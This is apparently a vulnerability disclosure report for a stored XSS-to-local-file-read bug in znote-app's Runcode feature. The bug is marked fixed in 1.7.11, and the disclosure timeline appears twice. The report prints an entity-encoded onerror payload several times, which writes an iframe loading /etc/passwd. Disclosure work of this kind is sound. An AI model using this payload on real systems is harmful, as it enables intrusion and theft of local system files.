XSS to LFI in Runcode Feature in alagrede/znote-app

Valid

Reported on

Nov 28th 2022

Description

By default runcode santized document prefix but if html encode to &#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041 then we can inserted html encoded func to html tag event like onerror <img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

POC: https://drive.google.com/file/d/1_Jh133kMAqMf8AUWrrjbOqRQpHSKlVyO/view?usp=sharing https://drive.google.com/file/d/1ek5dg4PG3rADuUPPXUOlKE6qSVGmKdZB/view?usp=sharing

Proof of Concept

<img src=x onerror="&#0000100&#0000111&#000099&#0000117&#0000109&#0000101&#0000110&#0000116&#000046&#0000119&#0000114&#0000105&#0000116&#0000101&#000040&#000039&#000060&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000032&#0000115&#0000114&#000099&#000061&#0000102&#0000105&#0000108&#0000101&#000058&#000047&#000047&#000047&#0000101&#0000116&#000099&#000047&#0000112&#000097&#0000115&#0000115&#0000119&#0000100&#000062&#000060&#000047&#0000105&#0000102&#0000114&#000097&#0000109&#0000101&#000062&#000039&#000041">

Github issue: https://github.com/alagrede/znote-app/issues/73

Impact

Read Local OS File With Stored XSS

References

https://github.com/alagrede/znote-app/issues/73

We are processing your report and will contact the alagrede/znote-app team within 24 hours. a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

reza.duty

commented a year ago

Researcher

any update?

Pavlos modified the Severity from High (8.6) to Low (2.3) a year ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Pavlos validated this vulnerability a year ago

reza.duty has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Pavlos marked this as fixed in 1.7.11 with commit d88933 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Pavlos published this vulnerability a year ago

reza.duty

commented a year ago

Researcher

can you please request for cve

to join this conversation

We are processing your report and will contact the alagrede/znote-app team within 24 hours. a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

reza.duty

commented a year ago

Researcher

any update?

Pavlos modified the Severity from High (8.6) to Low (2.3) a year ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Pavlos validated this vulnerability a year ago

reza.duty has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Pavlos marked this as fixed in 1.7.11 with commit d88933 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Pavlos published this vulnerability a year ago

reza.duty

commented a year ago

Researcher

can you please request for cve

to join this conversation